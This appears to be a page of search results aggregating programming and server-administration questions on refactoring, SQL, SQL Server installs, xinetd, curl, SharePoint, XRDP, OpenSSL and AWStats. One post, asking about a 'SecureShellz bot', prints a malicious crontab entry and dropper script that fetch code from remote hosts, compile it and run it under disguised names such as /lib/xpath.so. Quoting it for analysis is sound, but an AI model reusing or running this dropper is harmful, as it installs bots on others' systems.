Search Results

Search found 18220 results on 729 pages for 'null hypothesis'.

Page 536/729

  • How should I refactor switch statements like this (Switching on type) to be more OO?

    - by Taytay
    I'm seeing some code like this in our code base and want to refactor it (TypeScript pseudocode follows):

        class EntityManager {
            private findEntityForServerObject(entityType:string, serverObject:any):IEntity {
                var existingEntity:IEntity = null;
                switch(entityType) {
                    case Types.UserSetting:
                        existingEntity = this.getUserSettingByUserIdAndSettingName(serverObject.user_id, serverObject.setting_name);
                        break;
                    case Types.Bar:
                        existingEntity = this.getBarByUserIdAndId(serverObject.user_id, serverObject.id);
                        break;
                    // Lots more case statements here...
                }
                return existingEntity;
            }
        }

    The downsides of switching on type are self-explanatory. Normally, when switching behavior based on type, I try to push the behavior into subclasses so that I can reduce this to a single method call and let polymorphism take care of the rest. However, the following two things are giving me pause:

    1) I don't want to couple the serverObject with the class that is storing all of these objects. It doesn't know where to look for entities of a certain type. And unfortunately, the identity of a type of ServerObject varies with the type of ServerObject (so sometimes it's just an ID, other times it's a combination of an id and a uniquely identifying string, etc.). And this behavior doesn't belong down there on those subclasses; it is the responsibility of the EntityManager and its delegates.

    2) In this case, I can't modify the ServerObject classes since they're plain old data objects.

    It should be mentioned that I've got other instances of the above method that take a parameter like "IEntity" and proceed to do almost the same thing (but slightly modify the name of the methods they're calling to get the identity of the entity). So we might have:

        case Types.Bar:
            existingEntity = this.getBarByUserIdAndId(entity.getUserId(), entity.getId());
            break;

    So in that case, I can change the entity interface and subclasses, but this isn't behavior that belongs in that class. So I think that points me to some sort of map. Eventually I will call:

        private findEntityForServerObject(entityType:string, serverObject:any):IEntity {
            return aMapOfSomeSort[entityType].findByServerObject(serverObject);
        }

        private findEntityForEntity(someEntity:IEntity):IEntity {
            return aMapOfSomeSort[someEntity.entityType].findByEntity(someEntity);
        }

    Which means I need to register some sort of strategy classes/functions at runtime with this map. And again, I had darn well better remember to register one for each of my types, or I'll get a runtime exception. Is there a better way to refactor this? I feel like I'm missing something really obvious here.
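
    A minimal sketch of the registry-of-strategies approach described above (not from the original post; the finder names, the Types values, and the registration lines are illustrative assumptions):

        interface IEntity { entityType: string; }

        interface IEntityFinder {
            findByServerObject(serverObject: any): IEntity;
            findByEntity(entity: IEntity): IEntity;
        }

        class EntityFinderRegistry {
            private finders: { [entityType: string]: IEntityFinder } = {};

            register(entityType: string, finder: IEntityFinder): void {
                if (this.finders[entityType]) {
                    throw new Error("A finder is already registered for " + entityType);
                }
                this.finders[entityType] = finder;
            }

            get(entityType: string): IEntityFinder {
                const finder = this.finders[entityType];
                if (!finder) {
                    // Fail with a descriptive error instead of silently returning null.
                    throw new Error("No finder registered for entity type: " + entityType);
                }
                return finder;
            }
        }

        class EntityManagerUsingRegistry {
            constructor(private registry: EntityFinderRegistry) {}

            findEntityForServerObject(entityType: string, serverObject: any): IEntity {
                return this.registry.get(entityType).findByServerObject(serverObject);
            }

            findEntityForEntity(entity: IEntity): IEntity {
                return this.registry.get(entity.entityType).findByEntity(entity);
            }
        }

        // Hypothetical registration, done once at startup:
        // registry.register(Types.UserSetting, new UserSettingFinder(...));
        // registry.register(Types.Bar, new BarFinder(...));

    This keeps the per-type lookup knowledge in small finder objects owned by the EntityManager side rather than in the ServerObject data classes. A forgotten registration still only shows up at runtime, but it surfaces as an explicit error at the first lookup, and if the registration function is driven from the list of Types it can be checked by a single startup test.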

    Read the article

  • Is this a valid implementation of the repository pattern?

    - by user1578653
    I've been reading up about the repository pattern with a view to implementing it in my own application. Almost all examples I've found on the internet use some kind of existing framework rather than showing how to implement it 'from scratch'. Here are my first thoughts on how I might implement it - I was wondering if anyone could advise me on whether this is correct? I have two tables, named CONTAINERS and BITS. Each CONTAINER can contain any number of BITs. I represent them as two classes:

        class Container{
            private $bits;
            private $id;
            //...and a property for each column in the table...
            public function __construct(){
                $this->bits = array();
            }
            public function addBit($bit){
                $this->bits[] = $bit;
            }
            //...getters and setters...
        }

        class Bit{
            //some properties, methods etc...
        }

    Each class will have a property for each column in its respective table. I then have a couple of 'repositories' which handle things to do with saving/retrieving these objects from the database:

        //repository to control saving/retrieving Containers from the database
        class ContainerRepository{
            //inject the bit repository for use later
            public function __construct($bitRepo){
                $this->bitRepo = $bitRepo;
            }
            public function getById($id){
                //talk directly to Oracle here to load all column data into the object
                //get all the bits in the container
                $bits = $this->bitRepo->getByContainerId($id);
                foreach($bits as $bit){
                    $container->addBit($bit);
                }
                //return an instance of Container
            }
            public function persist($container){
                //talk directly to Oracle here to save it to the database
                //if its ID is NULL, create a new container in database, otherwise update the existing one
                //use BitRepository to save each of the Bits inside the Container
                $bitRepo = $this->bitRepo;
                foreach($container->bits as $bit){
                    $bitRepo->persist($bit);
                }
            }
        }

        //repository to control saving/retrieving Bits from the database
        class BitRepository{
            public function getById($id){}
            public function getByContainerId($containerId){}
            public function persist($bit){}
        }

    Therefore, the code I would use to get an instance of Container from the database would be:

        $bitRepo = new BitRepository();
        $containerRepo = new ContainerRepository($bitRepo);
        $container = $containerRepo->getById($id);

    Or to create a new one and save it to the database:

        $bitRepo = new BitRepository();
        $containerRepo = new ContainerRepository($bitRepo);
        $container = new Container();
        $container->setSomeProperty(1);
        $bit = new Bit();
        $container->addBit($bit);
        $containerRepo->persist($container);

    Can someone advise me as to whether I have implemented this pattern correctly? Thanks!
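
    For comparison, the same shape expressed with explicit interfaces (a TypeScript sketch, not from the original post; all names are illustrative): the domain objects stay persistence-ignorant and each repository receives its collaborators through the constructor, exactly as the PHP version does.

        interface Bit { id: number | null; }

        interface Container {
            id: number | null;
            bits: Bit[];
        }

        interface BitRepository {
            getById(id: number): Bit;
            getByContainerId(containerId: number): Bit[];
            persist(bit: Bit): void;
        }

        class ContainerRepository {
            // The collaborating repository is injected, as in the PHP version.
            constructor(private bitRepo: BitRepository) {}

            getById(id: number): Container {
                // Load the container row here (persistence detail omitted),
                // then attach its child Bits via the injected repository.
                const container: Container = { id: id, bits: [] };
                for (const bit of this.bitRepo.getByContainerId(id)) {
                    container.bits.push(bit);
                }
                return container;
            }

            persist(container: Container): void {
                // Insert when id is null, update otherwise (persistence detail omitted),
                // then persist each child Bit through the injected repository.
                for (const bit of container.bits) {
                    this.bitRepo.persist(bit);
                }
            }
        }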

    Read the article

  • SQL: the "ALL" comparison condition

    - by Todd Bao
    The ALL comparison conditions (>ALL, >=ALL, <ALL, <=ALL, =ALL, !=ALL) require the comparison to hold for every value returned by the subquery before the WHERE condition evaluates to TRUE. Take "=ALL" as an example:

        select employee_id, last_name, department_id
          from hr.employees
         where department_id =ALL (select department_id from hr.employees where salary > 16000);

        EMPLOYEE_ID + LAST_NAME                 + DEPARTMENT_ID
        ----------- + ------------------------- + -------------
                100 + King                      +            90
                101 + Kochhar                   +            90
                102 + De Haan                   +            90

        3 rows selected.

    Every employee whose salary exceeds 16000 belongs to the same department (department 90), so the condition can be satisfied and the employees of that department are returned. If the subquery returns more than one distinct department_id, no department_id can equal all of them at once and no rows come back - for example, lowering the threshold from 16000 to 8000:

        select employee_id, last_name
          from hr.employees
         where department_id =ALL (select department_id from hr.employees where salary > 8000);

        no rows selected

    Note, however, that when the subquery returns no rows at all, an ALL condition evaluates to TRUE for every row of the outer query. For example, with salary > 77777:

        select employee_id, last_name
          from hr.employees
         where department_id =ALL (select department_id from hr.employees where salary > 77777)
        /

    No employee earns more than 77777, so "where department_id =ALL (...)" is TRUE for every row and every employee is returned:

        EMPLOYEE_ID + LAST_NAME
        ----------- + -------------------------
                198 + OConnell
                199 + Grant
                ... + .....
                196 + Walsh
                197 + Feeney

        107 rows selected.

    The same applies to >ALL, <ALL, >=ALL, <=ALL and !=ALL when the subquery result is empty. Finally, an empty result set is not the same thing as a NULL in the comparison list - consider:

        select * from hr.employees where department_id >=ALL (null)
        /

    Todd

    Read the article

  • SQL Server 2008 R2 Quiet Installation Failure

    - by pk
    I've downloaded the SQL Server 2008 R2 software from Microsoft and am working on scripting a silent installation. I'm getting the following errors (and the duplicate paste job is not an accident, that's how it shows up for me):

        The following error occurred:
        Exception has been thrown by the target of an invocation.

        Error result: 1152035024
        Result facility code: 1194
        Result error code: 43216

        Please review the summary.txt log for further details

        The following error occurred:
        Exception has been thrown by the target of an invocation.

        Error result: 1152035024
        Result facility code: 1194
        Result error code: 43216

        Please review the summary.txt log for further details

        Microsoft (R) SQL Server 2008 R2 Setup 10.50.1600.01

    This is what shows up in the detailed SQL install log:

        2011-02-23 09:53:13 Slp: Running Action: ExecuteInitWorkflow
        2011-02-23 09:53:13 Slp: Workflow to execute: 'INITIALIZATION'
        2011-02-23 09:53:13 Slp: Error: Action "Microsoft.SqlServer.Configuration.BootstrapExtension.ExecuteWorkflowAction" threw an exception during execution.
        2011-02-23 09:53:13 Slp: Microsoft.SqlServer.Setup.Chainer.Workflow.ActionExecutionException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.ArgumentNullException: Value cannot be null.
        2011-02-23 09:53:13 Slp: Parameter name: InstallMediaPath

    Hopefully someone can help me work through this. Here is a simple version of my PowerShell code:

        $arguments = @()
        $arguments += "/q"
        $arguments += "/ACTION=Install"
        $arguments += "/FEATURES=SQL,Tools"
        $arguments += "/INSTANCENAME=MSSQLSERVER"
        $arguments += "/SQLSVCACCOUNT=`"$NetBIOSDomainName\$SQLServerServiceAccount`""
        $arguments += "/SQLSVCPASSWORD=`"$SQLServerServiceAccountPassword`""
        $arguments += "/SQLSYSADMINACCOUNTS=`"$NetBIOSDomainName\$SQLSysAdminAccount`""
        $arguments += "/AGTSVCACCOUNT=`"$NetBIOSDomainName\$SQLServerAgentAccount`""
        $arguments += "/IACCEPTSQLSERVERLICENSETERMS"

        Start-Process "$SQLServerSetupLocation\setup.exe" -Wait -ArgumentList $arguments -RedirectStandardOutput error.txt

    Read the article

  • xinetd 'connection reset by peer'

    - by ceejayoz
    I'm using percona-clustercheck (which comes with Percona's XtraDB Cluster packages) with xinetd, and I'm getting an error when trying to curl the clustercheck service.

    /usr/bin/clustercheck:

        #!/bin/bash
        #
        # Script to make a proxy (ie HAProxy) capable of monitoring Percona XtraDB Cluster nodes properly
        #
        # Author: Olaf van Zandwijk <[email protected]>
        # Documentation and download: https://github.com/olafz/percona-clustercheck
        #
        # Based on the original script from Unai Rodriguez
        #

        MYSQL_USERNAME="clustercheckuser"
        MYSQL_PASSWORD="clustercheckpassword!"
        ERR_FILE="/dev/null"
        AVAILABLE_WHEN_DONOR=0

        #
        # Perform the query to check the wsrep_local_state
        #
        WSREP_STATUS=`mysql --user=${MYSQL_USERNAME} --password=${MYSQL_PASSWORD} -e "SHOW STATUS LIKE 'wsrep_local_state';" 2>${ERR_FILE} | awk '{if (NR!=1){print $2}}' 2>${ERR_FILE}`

        if [[ "${WSREP_STATUS}" == "4" ]] || [[ "${WSREP_STATUS}" == "2" && ${AVAILABLE_WHEN_DONOR} == 1 ]]
        then
            # Percona XtraDB Cluster node local state is 'Synced' => return HTTP 200
            /bin/echo -en "HTTP/1.1 200 OK\r\n"
            /bin/echo -en "Content-Type: text/plain\r\n"
            /bin/echo -en "\r\n"
            /bin/echo -en "Percona XtraDB Cluster Node is synced.\r\n"
            /bin/echo -en "\r\n"
            exit 0
        else
            # Percona XtraDB Cluster node local state is not 'Synced' => return HTTP 503
            /bin/echo -en "HTTP/1.1 503 Service Unavailable\r\n"
            /bin/echo -en "Content-Type: text/plain\r\n"
            /bin/echo -en "\r\n"
            /bin/echo -en "Percona XtraDB Cluster Node is not synced.\r\n"
            /bin/echo -en "\r\n"
            exit 1
        fi

    /etc/xinetd.mysqlchk:

        # default: on
        # description: mysqlchk
        service mysqlchk
        {
            # this is a config for xinetd, place it in /etc/xinetd.d/
            disable         = no
            flags           = REUSE
            socket_type     = stream
            port            = 9200
            wait            = no
            user            = nobody
            server          = /usr/bin/clustercheck
            log_on_failure  += USERID
            only_from       = 10.0.0.0/8 127.0.0.1
            # recommended to put the IPs that need
            # to connect exclusively (security purposes)
            per_source      = UNLIMITED
        }

    When attempting to curl the service, I get a valid response (HTTP 200, text) but a 'connection reset by peer' notice at the end:

        HTTP/1.1 200 OK
        Content-Type: text/plain

        Percona XtraDB Cluster Node is synced.

        curl: (56) Recv failure: Connection reset by peer

    Unfortunately, Amazon ELB appears to see this as a failed check, not a succeeded one. How can I get clustercheck to exit gracefully, in a manner that curl doesn't see as a connection failure?

    Read the article

  • curl http_code of 000

    - by Mikkel Paulson
    I have a shell script that I use to monitor loading times and response codes on my live server cluster. It runs a total of 250 iterations every 5 minutes, distributed across 10 servers and 6 sites. It uses curl with the -w flag to return pertinent information, which is then parsed by my shell script:

        curl -svw 'monitor_load_times %{time_total} %{http_code}' -b 'server=$server' -m 15 -o /dev/null $url 2>&1

    This information is then parsed by a graphing script that can display a number of different responses. However, curl will occasionally return a response code of "000". When this happens, it seems to happen multiple times at once despite being distributed over many iterations. What I'm trying to work out is if this is a client-side issue that's skewing my results or if it's actually indicative of a server-side problem affecting my entire cluster. Does 000 mean that the connection was dropped? Database entries corresponding to curl iterations with that response code return "0.000" for the time_total value. All of the search results I've found for curl returning a code of 000 are related to HTTPS being unsupported, but all of my test URLs are HTTP. (The spike in 500 errors is a completely unrelated issue that affected my servers last night.)
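
    A small sketch of how the parsing step could keep these cases apart (TypeScript, not from the original post; the field layout follows the -w format string above and the category names are illustrative). An http_code of "000" together with a time_total of 0.000 means curl never received an HTTP status line, so it is best recorded as a transport-level failure (DNS error, refused or dropped connection, or the -m 15 timeout) rather than as a real response code:

        interface CurlSample {
            timeTotal: number;
            httpCode: string;   // e.g. "200", "503", "000"
        }

        // Parse one "monitor_load_times <time_total> <http_code>" line emitted by the curl -w format above.
        function parseSample(line: string): CurlSample | null {
            const m = line.match(/^monitor_load_times\s+([\d.]+)\s+(\d{3})$/);
            if (!m) {
                return null;
            }
            return { timeTotal: parseFloat(m[1]), httpCode: m[2] };
        }

        // "000" is not an HTTP status; treat it as "no response at all" when graphing.
        function classify(sample: CurlSample): string {
            if (sample.httpCode === "000") {
                return "connection_failed";
            }
            if (sample.httpCode.startsWith("5")) {
                return "server_error";
            }
            return "ok";
        }

        // Example: classify(parseSample("monitor_load_times 0.000 000")!) === "connection_failed"

    Keeping "connection_failed" as its own series makes it easier to see whether the 000 bursts line up across servers (pointing at the client or network) or stay isolated to one host.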

    Read the article

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server in which I found this in the crontab:

        [...]
        * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
        @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
        [...]

    The contents of http://stablehost.us/bots/regular.bot are:

        #!/bin/sh
        if [ $(whoami) = "root" ]; then
            echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make
            echo y|apt-get install libwww-perl
            apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make
            pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc
            wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c
            wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1
            wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2
            exit 1
        fi
        wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php
        wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa
        wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_

    I cannot contact the sysadmin for various reasons, so I cannot ask him about this. It seems this script downloads some remote C source code and binaries, compiles the source, and executes the results. I am a web developer, not an expert in C, but looking at the downloaded files it appears to be a bot injected into the server's cron. Can you give me more information about what this code does - how it works and what its purpose is?

    Read the article

  • Moving from ColdFusion 8 to ColdFusion 10 - Migration Fails

    - by XenoFoxx
    After having made several attempts to migrate from a ColdFusion 8 Standard server to a ColdFusion 10 Standard server, it feels like I am "almost" there. I'm using the 64-bit installer from Adobe's website, on a Windows Server 2008 (64-bit) server with IIS 7.0. The installation itself goes smoothly and the services start and are running, but at the end of the installation it says "ColdFusion Installed, but with errors" and it generates a log file. The log file reads:

        Migration Error: : Check that "C:\ColdFusion8" is a valid directory and is an installation of either ColdFusion MX 6 or ColdFusionMX 7

    and further down says:

        Status: WARNING
        Additional Notes: WARNING - Could not migrate settings from previous version of ColdFusion
        Custom Action: com.macromedia.ia.action.MigrateColdFusionAction
        Status: ERROR
        Additional Notes: ERROR - class com.macromedia.ia.action.MigrateColdFusionAction NonfatalInstallException null

    The applicationHost.config file has new XML referencing the ColdFusion 10 directory, but IIS is still using ColdFusion 8. I'm also going to guess that the settings in the CF Administrator have not been migrated, based on the message in the log above. I've followed the instructions on Adobe's site, including ensuring that ASP.NET, CGI, ISAPI Extensions, and ISAPI Filters are all enabled. I've also enabled IIS 6 Metabase Compatibility, even though I don't think it's needed. Has anyone else had similar issues with ColdFusion 10 and IIS 7? Currently I have uninstalled CF 10 and reverted back to

    Read the article

  • Problem with apache + ssl: length mismatch error and occasional bad request

    - by Ruben Garat
    We migrated a server from Slicehost to Linode recently and copied the config from one server to the other. Everything works perfectly, except that we get occasional "Bad Request" errors. The error is not common - you can use the site all day and not see it, and the next day it will happen a lot. Apart from that, much of the time, even though the request works fine, we get some errors. Using ssldump we get:

        New TCP connection #1: myip(39831) <-> develserk(443)
        1 1  0.2316 (0.2316)  C>S  SSLv2 compatible client hello
          Version 3.1
          cipher suites
            Unknown value 0x39
            Unknown value 0x38
            Unknown value 0x35
            TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
            TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
            TLS_RSA_WITH_3DES_EDE_CBC_SHA
            SSL2_CK_3DES
            Unknown value 0x33
            Unknown value 0x32
            Unknown value 0x2f
            SSL2_CK_RC2
            TLS_RSA_WITH_RC4_128_SHA
            TLS_RSA_WITH_RC4_128_MD5
            SSL2_CK_RC4
            TLS_DHE_RSA_WITH_DES_CBC_SHA
            TLS_DHE_DSS_WITH_DES_CBC_SHA
            TLS_RSA_WITH_DES_CBC_SHA
            SSL2_CK_DES
            TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
            TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
            TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
            TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
            SSL2_CK_RC2_EXPORT40
            TLS_RSA_EXPORT_WITH_RC4_40_MD5
            SSL2_CK_RC4_EXPORT40
        1 2  0.2429 (0.0112)  S>C  Handshake
          ServerHello
          Version 3.1
          session_id[32]=
            9a 1e ae c4 5f df 99 47 97 40 42 71 97 eb b9 14
            96 2d 11 ac c0 00 15 67 4e f3 7d 65 4e c4 30 e9
          cipherSuite         Unknown value 0x39
          compressionMethod   NULL
        1 3  0.2429 (0.0000)  S>C  Handshake
          Certificate
        1 4  0.2429 (0.0000)  S>C  Handshake
          ServerKeyExchange
        1 5  0.2429 (0.0000)  S>C  Handshake
          ServerHelloDone
        1 6  0.4965 (0.2536)  C>S  Handshake
          ClientKeyExchange
        1 7  0.4965 (0.0000)  C>S  ChangeCipherSpec
        1 8  0.4965 (0.0000)  C>S  Handshake
        1 9  0.5040 (0.0075)  S>C  ChangeCipherSpec
        1 10 0.5040 (0.0000)  S>C  Handshake
        ERROR: Length mismatch

    From the apache error.log:

        [Fri Aug 27 14:50:05 2010] [debug] ssl_engine_io.c(1892): OpenSSL: I/O error, 5 bytes expected to read on BIO#b80c1e70 [mem: b8100918]

    The server is Ubuntu 10.04.1, the apache version is 2.2.14-5ubuntu8, and the openssl version is 0.9.8k-7ubuntu8.

    Read the article

  • Cannot delete a SharePoint web application

    - by Vijay
    What I have: a normal web application with 3 site collections, all named "PDirectory". Other than this, I have only the Central Administration web application in the farm.

    What I want: to delete that web application, "PDirectory".

    What problem am I facing: I am not able to delete the web application. I get the error below when I try to delete it, but the site collections got deleted!

    Error:

        An object in the SharePoint administrative framework, "SPWebApplication Name=XXX Parent=SPWebService", could not be deleted because other objects depend on it. Update all of these dependants to point to null or different objects and retry this operation. The dependant objects are as follows:
        SPFarm Name=SharePoint_Config
        SPFarm Name=SharePoint_Config
        at Microsoft.SharePoint.Administration.SPConfigurationDatabase.DeleteObject(Guid id)
        at Microsoft.SharePoint.Administration.SPConfigurationDatabase.DeleteObject(SPPersistedObject obj)
        at Microsoft.SharePoint.Administration.SPPersistedObject.Delete()
        at Microsoft.SharePoint.Administration.SPWebApplication.Delete()
        at Microsoft.SharePoint.ApplicationPages.DeleteWebApplicationPage.BtnSubmit_Click(Object sender, EventArgs e)
        at System.Web.UI.WebControls.Button.OnClick(EventArgs e)
        at System.Web.UI.WebControls.Button.RaisePostBackEvent(String eventArgument)
        at System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument)
        at System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument)
        at System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData)
        at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)

    Can somebody tell me how I can delete this web application? Thanks in advance!

    Read the article

  • XRDP errors when trying to use sesman-x11rdp

    - by Nicholas
    I've just installed Ubuntu 11.10 Desktop on an old laptop of mine and I wanted to set it up so I could remote into it from my Windows desktop. I've installed XRDP, but when I attempt to log in using sesman-x11rdp it logs in, then the window shuts down. I've checked over the logs and here is what I get at the time of login:

        [20120123-16:49:23] [INFO ] scp thread on sck 8 started successfully
        [20120123-16:49:23] [INFO ] granted TS access to user nicholas
        [20120123-16:49:24] [INFO ] starting X11rdp session...
        [20120123-16:49:24] [CORE ] error starting X server - user nicholas - pid 3869
        [20120123-16:49:24] [DEBUG] errno: 2, description: No such file or directory
        [20120123-16:49:24] [DEBUG] execve parameter list: 11
        [20120123-16:49:24] [DEBUG] argv[0] = X11rdp
        [20120123-16:49:24] [DEBUG] argv[1] = :11
        [20120123-16:49:24] [DEBUG] argv[2] = -geometry
        [20120123-16:49:24] [DEBUG] argv[3] = 1280x720
        [20120123-16:49:24] [DEBUG] argv[4] = -depth
        [20120123-16:49:24] [DEBUG] argv[5] = 16
        [20120123-16:49:24] [DEBUG] argv[6] = -bs
        [20120123-16:49:24] [DEBUG] argv[7] = -ac
        [20120123-16:49:24] [DEBUG] argv[8] = -nolisten
        [20120123-16:49:24] [DEBUG] argv[9] = tcp
        [20120123-16:49:25] [DEBUG] argv[10] = (null)
        [20120123-16:49:34] [ERROR] X server for display 11 startup timeout
        [20120123-16:49:34] [ERROR] X server for display 11 startup timeout
        [20120123-16:49:34] [INFO ] starting xrdp-sessvc - xpid=3869 - wmpid=3868
        [20120123-16:49:34] [ERROR] another Xserver is already active on display 11
        [20120123-16:49:34] [DEBUG] aborting connection...
        [20120123-16:49:34] [INFO ] session 3867 - user nicholas - terminated

    Can anyone point me to the proper way to get this working with X11rdp?

    Read the article

  • Can I configure a Windows NDES server to use the Triple DES (3DES) algorithm for PKCS#7 answer encryption?

    - by O.Shevchenko
    I am running an SCEP client to enroll certificates against an NDES server. If OpenSSL is not in FIPS mode, everything works fine. In FIPS mode I get the following error:

        pkcs7_unwrap():pkcs7.c:708] error decrypting inner PKCS#7
        139968442623728:error:060A60A3:digital envelope routines:FIPS_CIPHERINIT:disabled for fips:fips_enc.c:142:
        139968442623728:error:21072077:PKCS7 routines:PKCS7_decrypt:decrypt error:pk7_smime.c:557:

    That's because the NDES server uses the DES algorithm to encrypt the returned PKCS#7 packet. I used the following debug code:

        /* Copy enveloped data from PKCS#7 */
        bytes = BIO_read(pkcs7bio, buffer, sizeof(buffer));
        BIO_write(outbio, buffer, bytes);
        p7enc = d2i_PKCS7_bio(outbio, NULL);

        /* Get encryption PKCS#7 algorithm */
        enc_alg=p7enc->d.enveloped->enc_data->algorithm;
        evp_cipher=EVP_get_cipherbyobj(enc_alg->algorithm);
        printf("evp_cipher->nid = %d\n", evp_cipher->nid);

    The last line always prints:

        evp_cipher->nid = 31

    which is defined in openssl-1.0.1c/include/openssl/objects.h:

        #define SN_des_cbc   "DES-CBC"
        #define LN_des_cbc   "des-cbc"
        #define NID_des_cbc  31

    I use the 3DES algorithm for PKCS#7 request encryption in my code (pscep.enc_alg = (EVP_CIPHER *)EVP_des_ede3_cbc()) and the NDES server accepts these requests, but it always returns the answer encrypted with DES. Can I configure a Windows NDES server to use the Triple DES (3DES) algorithm for PKCS#7 answer encryption?

    Read the article

  • Cannot connect to a VPN server - authentication failed with error code 691

    - by stacker
    When trying to connect to a VPN server, I get the 691 error code on the client, which says:

        Error Description: 691: The remote connection was denied because the user name and password combination you provided is not recognized, or the selected authentication protocol is not permitted on the remote access server.

    I validated that the username and password are correct. I also installed a certificate to use with the IKEv2 security type, and validated that the VPN server supports that security method. But I cannot log in. On the server I get this log entry:

        Network Policy Server denied access to a user. The user DomainName\UserName connected from IP address but failed an authentication attempt due to the following reason: The remote connection was denied because the user name and password combination you provided is not recognized, or the selected authentication protocol is not permitted on the remote access server.

    Any idea what I can do? Thanks in advance!

        Log Name:      Security
        Source:        Microsoft-Windows-Security-Auditing
        Date:          12/29/2010 7:12:20 AM
        Event ID:      6273
        Task Category: Network Policy Server
        Level:         Information
        Keywords:      Audit Failure
        User:          N/A
        Computer:      VPN.domain.com
        Description:
        Network Policy Server denied access to a user.
        Contact the Network Policy Server administrator for more information.

        User:
            Security ID:                  domain\Administrator
            Account Name:                 domain\Administrator
            Account Domain:               domani
            Fully Qualified Account Name: domain.com/Users/Administrator

        Client Machine:
            Security ID:                  NULL SID
            Account Name:                 -
            Fully Qualified Account Name: -
            OS-Version:                   -
            Called Station Identifier:    192.168.147.171
            Calling Station Identifier:   192.168.147.191

        NAS:
            NAS IPv4 Address:             -
            NAS IPv6 Address:             -
            NAS Identifier:               VPN
            NAS Port-Type:                Virtual
            NAS Port:                     0

        RADIUS Client:
            Client Friendly Name:         VPN
            Client IP Address:            -

        Authentication Details:
            Connection Request Policy Name: Microsoft Routing and Remote Access Service Policy
            Network Policy Name:            All
            Authentication Provider:        Windows
            Authentication Server:          VPN.domain.home
            Authentication Type:            EAP
            EAP Type:                       Microsoft: Secured password (EAP-MSCHAP v2)
            Account Session Identifier:     313933
            Logging Results:                Accounting information was written to the local log file.
            Reason Code:                    16
            Reason:                         Authentication failed due to a user credentials mismatch. Either the user name provided does not map to an existing user account or the password was incorrect.

    Read the article

  • How to import certificate for Apache + LDAPS?

    - by user101956
    I am trying to get LDAPS to work through Apache 2.2.17 (Windows Server 2008). If I use ldap (plain text), my configuration works great:

        LDAPTrustedGlobalCert CA_DER C:/wamp/certs/Trusted_Root_Certificate.cer
        LDAPVerifyServerCert Off
        <Location />
            AuthLDAPBindDN "CN=corpsvcatlas,OU=Service Accounts,OU=u00958,OU=00958,DC=hca,DC=corpad,DC=net"
            AuthLDAPBindPassword ..removed..
            AuthLDAPURL "ldaps://gc-hca.corpad.net:3269/dc=hca,dc=corpad,dc=net?sAMAccountName?sub"
            AuthType Basic
            AuthName "USE YOUR WINDOWS ACCOUNT"
            AuthBasicProvider ldap
            AuthUserFile /dev/null
            require valid-user
        </Location>

    I also tried the other encryption choices besides CA_DER just to be safe, with no luck. Finally, I also needed this with Apache Tomcat. For Tomcat I used the Tomcat JRE and ran a line like this:

        keytool -import -trustcacerts -keystore cacerts -storepass changeit -noprompt -alias mycert -file Trusted_Root_Certificate.cer

    After doing the above, LDAPS worked great via Tomcat. That lets me know that my certificate is OK.

    Update: Both ldap modules are turned on, since using ldap instead of ldaps works fine. When I run a git clone, this is the error returned:

        C:\Temp> git clone http://eqb9718@localhost/git/Liferay.git
        Cloning into Liferay...
        Password:
        error: The requested URL returned error: 500 while accessing http://eqb9718@localhost/git/Liferay.git/info/refs
        fatal: HTTP request failed

    access.log has this:

        127.0.0.1 - eqb9718 [23/Nov/2011:18:25:12 -0600] "GET /git/Liferay.git/info/refs?service=git-upload-pack HTTP/1.1" 500 535
        127.0.0.1 - eqb9718 [23/Nov/2011:18:25:33 -0600] "GET /git/Liferay.git/info/refs HTTP/1.1" 500 535

    apache_error.log has nothing. Is there any more verbose logging I can turn on, or better tests to do?

    Read the article

  • AWStats consumes too many resources, how to disable it temporarily

    - by trante
    For some days AWStats has been taking 10-20% of my CPU and 400-550 MB of RAM, and it runs for hours. Maybe my site's traffic has grown so processing takes longer than before, or maybe some bug in the program causes this. Either way, I want to disable AWStats temporarily; I may want to re-enable it in the future. I found an answer for this, but it gives commands to remove AWStats, and I only want to disable it temporarily. My system is CentOS 6.3, Plesk 11.5.30 Update #19.

    I tried to disable the cron jobs. I ran:

        # killall awstats.pl

    I opened the cron file:

        # vi /etc/cron.daily/awstats

    and changed it to this:

        #!/bin/sh
        #/usr/share/awstats/awstats_updateall.pl now -awstatsprog=/var/www/cgi-bin/awstats/awstats.pl -configdir=/etc/awstats >/dev/null 2>&1
        exit 0

    After some time I still see that awstats is running. What more should I do so that awstats does not run again, without removing my files?

    After changing /etc/cron.daily/awstats, awstats doesn't start during the day, but every night at 03:15 it starts again. Because Plesk auto-updates run at that time, I configured Plesk not to update automatically, but it seems that last night at 03:15 awstats still started. Is there any way to stop awstats temporarily other than the solution below? That solution deletes the awstats configs permanently and I don't know how I would revert it in the future.

